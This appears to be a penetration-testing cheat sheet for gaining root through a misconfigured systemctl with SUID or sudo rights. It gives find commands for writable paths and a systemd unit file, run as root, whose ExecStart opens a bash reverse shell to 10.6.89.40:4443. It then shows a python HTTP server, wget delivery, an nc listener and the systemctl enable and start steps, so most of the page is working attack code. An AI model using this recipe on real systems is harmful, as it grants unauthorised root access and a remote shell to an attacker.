Powered by

# systemctl privesc

Privilege escalation using misconfigured SUID or sudo permissions on systemctl

# Find writeable file or directory 

find / -maxdepth 2 -writable -type d  # writable directories
find / -maxdepth 2 -writable -type f  # writable files

# Write payload shellz.service 

[Unit]
Description=shellz

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.6.89.40/4443 0>&1' # Change IP and/or port

[Install]
WantedBy=multi-user.target

I like to use cat > if you have upgraded your shell. otherwise you can setup a simple server on the attacking box and wget it.

python3 -m http.server 80

On the target

wget http://10.6.89.40/shellz.service #C hange IP

# setup a listener

setup a listener on the attacking box

nc -lvnp 4443

# start service

Execute the payload assuming exploit is under /var/tmp.

/bin/systemctl enable /var/tmp/shellz.service
/bin/systemctl start shellz

© Copyright 2021. All rights reserved.